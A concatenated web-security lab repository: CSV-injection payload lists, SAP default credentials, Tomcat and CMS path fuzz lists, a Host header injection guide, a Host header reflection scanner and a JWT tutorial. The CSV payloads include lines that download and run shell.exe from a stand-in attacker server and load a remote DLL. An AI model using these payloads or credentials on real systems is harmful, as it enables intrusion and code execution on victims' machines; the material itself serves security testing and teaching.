22 | -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/Intruder/csv-payload.txt: -------------------------------------------------------------------------------- 1 | DDE ("cmd";"/C calc";"!A0")A0 2 | @SUM(1+9)*cmd|' /C calc'!A0 3 | =10+20+cmd|' /C calc'!A0 4 | =cmd|' /C notepad'!'A1' 5 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 6 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/README.md: -------------------------------------------------------------------------------- 1 | ## CSV Injection Payloads 2 | 3 | 4 | 5 | CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. 6 | 7 | #### Payloads : 8 | 9 | ``` 10 | DDE ("cmd";"/C calc";"!A0")A0 11 | @SUM(1+9)*cmd|' /C calc'!A0 12 | =10+20+cmd|' /C calc'!A0 13 | =cmd|' /C notepad'!'A1' 14 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 15 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 16 | ``` 17 | 18 | #### References : 19 | 20 | ###### CSV Injection : 21 | 22 | * 👉 https://owasp.org/www-community/attacks/CSV_Injection 23 | 24 | ##### Cloning an Existing Repository ( Clone with HTTPS ) 25 | ``` 26 | root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git 27 | ``` 28 | 29 | ##### Cloning an Existing Repository ( Clone with SSH ) 30 | ``` 31 | root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git 32 | ``` 33 | 34 | #### Donate! 
35 | 36 | Support the authors: 37 | 38 | #### LiberaPay: 39 | 40 | 41 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/default/big-1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/Intruder/default/big-1.txt -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/default/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/Intruder/default/big.txt -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/joomla/joomla_themes.fuzz.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | 
templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap.fuzz.txt: -------------------------------------------------------------------------------- 1 | /sap/bc/gui/sap/its/webgui 2 | /sap/public/icman/ping 3 | /sap/admin 4 | /sap/public/info 5 | /sap/wdisp/admin 6 | /scripts/wgate 7 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap_common.txt: -------------------------------------------------------------------------------- 1 | sapservice 2 | sapadm 3 | adm 4 | sqd 5 | sapdb 6 | 7 | sapservice 8 | sapr3 9 | sapsr3 10 | ora 11 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/sap/sap_default.txt: -------------------------------------------------------------------------------- 1 | SAP* 06071992 2 | SAP* PASS 3 | DDIC 19920706 4 | DDIC Welcome01 5 | SAPCPIC ADMIN 6 | EARLYWATCH SUPPORT 7 | TMSADM PASSWORD 8 | TMSADM ADMIN 9 | TMSADM $1Pawd2& 10 | ADMIN welcome 11 | ADSUSER ch4ngeme 12 | ADS_AGENT ch4ngeme 13 | DEVELOPER ch4ngeme 14 | J2EE_ADMIN ch4ngeme 15 | SAPJSF ch4ngeme 16 | SAPR3 SAP 17 | CTB_ADMIN sap123 18 | XMI_DEMO sap123 19 | IDEADM admin 20 | SMD_ADMIN init1234 21 | SMD_BI_RFC init1234 22 | SMD_RFC init1234 23 | SOLMAN_ADMIN init1234 24 | SOLMAN_BTC init1234 25 | SAPSUPPORT init1234 26 | CONTENTSERV init1234 27 | SMD_AGT init1234 28 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/tomcat/apachetomcat.fuzz.txt: -------------------------------------------------------------------------------- 1 | /examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | 
/examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 29 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 30 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 32 | /servlet/org.apache.catalina.servlets.ManagerServlet 33 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 34 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 35 | /tomcat-docs 36 | /webdav 37 | /webdav/index.html 38 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 39 | /webdav/servlet/webdav/ 40 | /conf/ 41 | /conf/server.xml/ 42 | /WEB-INF/ 43 | /WEB-INF/web.xml 44 | /WEB-INF/classes/ 45 | /shared/ 46 | /shared/lib/ 47 | 
-------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/tomcat/tomcat-2.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | 
servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | ?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1 38 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/wordpress/wordpress_detector.txt: -------------------------------------------------------------------------------- 1 | wp-admin/js/common.js 2 | wp-includes/js/jquery/jquery.js 3 | wp-includes/js/wp-lists.js 4 | wp-includes/js/plupload/plupload.js 5 | wp-includes/css/admin-bar.css -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/img/directory-image.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/img/directory-image.jpg -------------------------------------------------------------------------------- /file-upload-vulnerabilities/How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/file-upload-vulnerabilities/How to Exploit File Upload Vulnerabilities (and How to Fix Them!) we45 Blogs.pdf -------------------------------------------------------------------------------- /file-upload-vulnerabilities/file-upload.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ## What are file upload vulnerabilities? 5 | File upload vulnerabilities are when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size. Failing to properly enforce restrictions on these could mean that even a basic image upload function can be used to upload arbitrary and potentially dangerous files instead. This could even include server-side script files that enable remote code execution. 
6 | 7 | > In some cases, the act of uploading the file is in itself enough to cause damage. Other attacks may involve a follow-up HTTP request for the file, typically to trigger its execution by the server. 8 | 9 | - https://www.we45.com/post/how-to-exploit-file-upload-vulnerabilities-and-how-to-fix-them 10 | - https://portswigger.net/web-security/file-upload 11 | - https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities 12 | -------------------------------------------------------------------------------- /http-host-header-injection/HTTP-Host-Header-Injection.md: -------------------------------------------------------------------------------- 1 | # Host Header Injection 2 | 3 | ## Introduction 4 | HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. 5 | 6 | ## Where to find 7 | In features where the website sends email to the user, for example forgot-password or newsletter flows. 8 | 9 | ## How to exploit 10 | 1. Change the Host header 11 | ``` 12 | GET /index.php HTTP/1.1 13 | Host: evil-website.com 14 | ... 15 | ``` 16 | 2. Duplicate the Host header 17 | ``` 18 | GET /index.php HTTP/1.1 19 | Host: vulnerable-website.com 20 | Host: evil-website.com 21 | ... 22 | ``` 23 | 3. Add line wrapping 24 | ``` 25 | GET /index.php HTTP/1.1 26 | Host: vulnerable-website.com 27 | Host: evil-website.com 28 | ... 29 | ``` 30 | 4. 
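Add host override headers 31 | ``` 32 | X-Forwarded-For: evil-website.com 33 | X-Forwarded-Host: evil-website.com 34 | X-Client-IP: evil-website.com 35 | X-Remote-IP: evil-website.com 36 | X-Remote-Addr: evil-website.com 37 | X-Host: evil-website.com 38 | ``` 39 | How to use? In this case im using "X-Forwarded-For : evil.com" 40 | ``` 41 | GET /index.php HTTP/1.1 42 | Host: vulnerable-website.com 43 | X-Forwarded-For : evil-website.com 44 | ... 45 | ``` 46 | 5. Supply an absolute URL 47 | ``` 48 | GET https://vulnerable-website.com/ HTTP/1.1 49 | Host: evil-website.com 50 | ... 51 | ``` 52 | 53 | ## References 54 | * [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) 55 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/Host-Header-Vulnerability-Detection.py: -------------------------------------------------------------------------------- 
"""Host header reflection scanner.

Crawls the target site, then requests every discovered path with a forged
``Host`` header and reports paths whose response reflects the forged value.
Runs on Python 2.7 and Python 3.
"""
import os
import sys
import socket
import fileinput
import subprocess

try:
    from shlex import quote          # Python 3.3+
except ImportError:                  # Python 2
    from pipes import quote

try:
    from termcolor import colored
except ImportError:                  # termcolor not installed: plain, uncoloured output
    def colored(text, color=None):
        return text

try:
    _prompt = raw_input              # Python 2
except NameError:
    _prompt = input                  # Python 3

# Host value we inject; a response that reflects it means the server trusts the Host header.
CANARY_HOST = 'evil.com'
RESULTS_DIR = 'results'
PROBE_TIMEOUT = 10  # seconds; the netcat pipeline this replaces had no timeout at all


def build_request(path, host=CANARY_HOST):
    """Return the raw HTTP/1.1 GET for `path` carrying the canary Host header.

    This is the same request the old `echo ... | netcat` pipeline sent.
    """
    return "GET %s HTTP/1.1\r\nHost:%s\r\n\r\n" % (str(path), host)


def MakeCommand(line, domain):
    """Return the shell pipeline equivalent of the probe (kept for callers of the old API).

    Both `line` (a path taken from crawler output) and `domain` (typed by the user)
    are shell-quoted. The previous version interpolated them raw into the command
    string, so a crawled URL containing shell metacharacters would have executed
    arbitrary commands on the machine running this scanner. The request now carries
    real CR/LF bytes instead of literal backslash escapes, which `echo` translated
    only on some shells.
    """
    return "echo %s | netcat %s 80 " % (quote(build_request(line)), quote(str(domain)))


def probe(path, domain, port=80, timeout=PROBE_TIMEOUT):
    """Send the canary request to `domain`:`port` and return the raw response as text.

    Returns '' when the host is unreachable, so the caller reports the path as not
    vulnerable instead of crashing. Reads until the server closes the connection or
    `timeout` seconds pass without data; whatever was received by then is returned.
    Uses a plain socket, so no shell and no external netcat binary are involved.
    """
    request = build_request(path)
    if not isinstance(request, bytes):
        request = request.encode('utf-8', 'replace')
    chunks = []
    try:
        sock = socket.create_connection((domain, port), timeout)
    except socket.error:
        return ''
    try:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.error:
        pass  # timeout or reset: inspect whatever was received
    finally:
        sock.close()
    return b''.join(chunks).decode('utf-8', 'replace')


def check_path(path, domain, results_path):
    """Probe one path, print the verdict, and append vulnerable paths to `results_path`."""
    response = probe(path, domain)
    if CANARY_HOST in response:
        print(colored('[-] ' + str(path) + ' ----> vulnerable', 'red'))
        with open(results_path, "a") as myfile:
            myfile.write(str(path) + '\n')
    else:
        print(colored('[+] ' + str(path), 'green'))


def split_site(website):
    """Return (website, domain).

    `website` gains an `http://` scheme when none is present; `domain` is the bare
    host. The old code kept everything after `//` as the host, so a URL with a path
    yielded an unresolvable target and a results file name containing slashes.
    """
    if '//' in website:
        domain = website.split('//', 1)[1]
    else:
        domain = website
        website = 'http://' + website
    domain = domain.split('/', 1)[0]
    return website, domain


def paths_from_sitepath(filename):
    """Yield the URL column (second space-separated field) of each crawler output line.

    Blank or single-column lines are skipped; the old code raised IndexError on them.
    """
    for line in fileinput.input([filename]):
        parts = line.strip().split(" ")
        if len(parts) < 2:
            continue
        yield parts[1]


def paths_from_list(filename):
    """Yield one path per non-empty line of a hand-written path list."""
    for line in fileinput.input([filename]):
        line = line.strip()
        if line:
            yield line


def main():
    """Crawl the site, then probe every discovered path with a forged Host header."""
    website, domain = split_site(_prompt("Enter Site Address : "))
    if not domain:
        sys.exit("No host given.")
    if not os.path.isdir(RESULTS_DIR):
        os.makedirs(RESULTS_DIR)
    results_path = os.path.join(RESULTS_DIR, str(domain) + '.txt')
    if not os.path.isfile(results_path):
        open(results_path, 'a').close()  # portable replacement for os.mknod
    print("web crawling start ...")
    # Argument list instead of a shell string: `website` is user input and must never reach a shell.
    with open('sitepath.txt', 'w') as sitepath:
        subprocess.call([sys.executable, 'crawler.py', '-d', '20', '-l', str(website)], stdout=sitepath)
    print("web crawling end ...")

    for path in paths_from_sitepath('sitepath.txt'):
        check_path(path, domain, results_path)
    for path in paths_from_list('mycrawler.txt'):
        check_path(path, domain, results_path)
    print('save in ' + results_path)


if __name__ == '__main__':
    main()
-------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/README.md: -------------------------------------------------------------------------------- 1 | ![alt text](http://uupload.ir/files/54lo_website-security.png "WEBSecurity") 2 | ## Host Header Attack Test - Description (Acunetix) 3 | In many cases, developers are trusting the HTTP Host header value and using it to generate links, import scripts and even generate password resets links with its value. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels like password reset emails. 4 | ##Install 5 | please Installing python 2.7 or higher, for example, in centos 6.3, see the link below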
6 | [Installing python 2.7 on centos 6.3](https://github.com/h2oai/h2o-2/wiki/installing-python-2.7-on-centos-6.3.-follow-this-sequence-exactly-for-centos-machine-only)

7 | 8 | In a Linux terminal:
9 | 1. `git clone https://github.com/keramatAlijani/Host-Header-Attack-Test.git`
10 | 2. `cd Host-Header-Attack-Test`
11 | 3. `pip install -r requirements.txt`

12 | If you are using pip version 7.1.0, consider upgrading via the `pip install --upgrade pip` command. 13 | 14 | ## Usage 15 | 1. `python Host-Header-Vulnerability-Detection.py`
16 | 2. type your domain
17 | 3. Wait until the process completes, then check the results directory
18 | 19 | ## Remediation (Acunetix) 20 | The web application should use SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard server_name, and under Apache by using a non-wildcard ServerName and turning the UseCanonicalName directive on. 21 | 22 | ## Contact 23 | Email : keramat.alijani@aut.ac.ir
24 | 25 | 26 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/mycrawler.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/requirements.txt: -------------------------------------------------------------------------------- 1 | termcolor 2 | re 3 | urlparse 4 | optparse 5 | hashlib 6 | cgi 7 | traceback 8 | bs4 9 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/results/New Text Document.txt: -------------------------------------------------------------------------------- 1 | keramatAlijani/Host-Header-Attack-Test 2 | -------------------------------------------------------------------------------- /http-host-header-injection/Host-Header-Attack-Test/sitepath.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | _**Please read** our_ 2 | [**contribution guide**](https://github.com/dwyl/contributing) 3 | (_thank you_!) 
4 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2016 Do What You Love (DWYL) 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
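8 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/Procfile: -------------------------------------------------------------------------------- 1 | web: node example/server.js 2 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/server.js: -------------------------------------------------------------------------------- 
var port = process.env.PORT || 1337; // let heroku define port or use 1337
var http = require('http');          // core node.js http (no frameworks)
var url = require('url');            // core node.js url (no frameworks)
var app = require('./lib/helpers');  // auth, token verification & render helpers

// Minimal router: dispatch on the pathname only (query string is ignored),
// everything unknown gets the 404 page.
http.createServer(function (req, res) {
  var path = url.parse(req.url).pathname;
  if( path === '/' || path === '/home' ) { app.home(res); }            // homepage
  else if( path === '/auth')    { app.handler(req, res); }             // authenticator
  else if( path === '/private') { app.validate(req, res, app.done); }  // private content
  else if( path === '/logout')  { app.logout(req, res, app.done); }    // end session
  else if( path === '/exit')    { app.exit(res); }                     // for testing ONLY: no auth check, keep out of deployed builds
  else { app.notFound(res); }                                          // 404 error
}).listen(port);

console.log("Visit: http://127.0.0.1:" + port);
-------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/test/mock.js: -------------------------------------------------------------------------------- 
// both the request and response http objects are event emitters
var events = require('events');      // use the core node.js event emitter
var req = new events.EventEmitter(); // gives us req.emit and req.on('data')
var res = new events.EventEmitter(); // gives us res.emit and res.on('data')

// mock methods for http request & response
// request should have:
//   req.headers - set the desired headers object before invoking the function;
//   here are a few defaults
req.headers = {
  'Content-Type': 'text/html',
  'user-agent': 'Mozilla/5.0',
};

// req.method e.g: POST or GET
// default to POST cause our check is for this method in authHandler
req.method = 'POST';

// req.on('data' ... and req.on('end' ... come from EventEmitter (see above)
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

// response should have:
// res.writeHead(status, headers) - records what the handler sent so tests can assert on it.
// (the old `res = res || {}` reassignment was a no-op: res is always the emitter above)
res.writeHead = function(status, headers) {
  res.headers = headers;
  res.status = status;
  return res;
};

// res.end(body) - records the response body
res.end = function(str) {
  res.body = str;
  return res;
};

module.exports = {
  req : req,
  res : res
};
-------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/fail.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authentication with JSON Web Tokens 7 | 8 | 9 | 10 |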

Try again...

11 |
12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 |

Hint:

20 |
    21 |
  • username: masterbuilder
  • 22 |
  • password: itsnosecret
  • 23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authentication with JSON Web Tokens 7 | 8 | 9 | 10 | 11 |

Login to see amazing content:

12 |
13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/example/views/restricted.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Authenticated! 7 | 8 | 9 | 10 |

You Authenticated!

11 | 12 |
13 | 14 | 15 |
16 | 17 | 18 | -------------------------------------------------------------------------------- /jwt-authentication/json-web-tokens-introduction/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "learn-json-web-tokens", 3 | "version": "1.0.6", 4 | "description": "A JSON Web Tokens Tutorial to secure your node.js apps!", 5 | "main": "server.js", 6 | "scripts": { 7 | "functional": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js | tap-spec", 8 | "coverage": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js && istanbul check-coverage --statements 100 --functions 100 --lines 100 --branches 100", 9 | "spec": "tape ./example/test/integration.js | tap-spec", 10 | "test": "istanbul cover ./node_modules/tape/bin/tape ./example/test/functional.js", 11 | "start": "node ./example/server.js", 12 | "jshint": "jshint -c .jshintrc --exclude-path .gitignore ." 13 | }, 14 | "repository": { 15 | "type": "git", 16 | "url": "https://github.com/dwyl/learn-json-web-tokens.git" 17 | }, 18 | "keywords": [ 19 | "JSON", 20 | "Web", 21 | "Tokens", 22 | "JWT", 23 | "Security" 24 | ], 25 | "author": "@nelsonic (https://github.com/nelsonic)", 26 | "license": "ISC", 27 | "bugs": { 28 | "url": "https://github.com/dwyl/learn-json-web-tokens/issues" 29 | }, 30 | "homepage": "https://github.com/dwyl/learn-json-web-tokens", 31 | "dependencies": { 32 | "jsonwebtoken": "^8.5.1", 33 | "level": "^5.0.1" 34 | }, 35 | "devDependencies": { 36 | "istanbul": "^0.4.3", 37 | "jshint": "^2.8.0", 38 | "pre-commit": "^1.0.10", 39 | "request": "^2.60.0", 40 | "tap-spec": "^5.0.0", 41 | "tape": "^4.0.1" 42 | }, 43 | "engines": { 44 | "node": ">= 6" 45 | }, 46 | "pre-commit": [ 47 | "jshint", 48 | "coverage" 49 | ] 50 | } 51 | -------------------------------------------------------------------------------- /local-remote-file-inclusion/rfi-lfi-payload-list/LICENSE: 
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
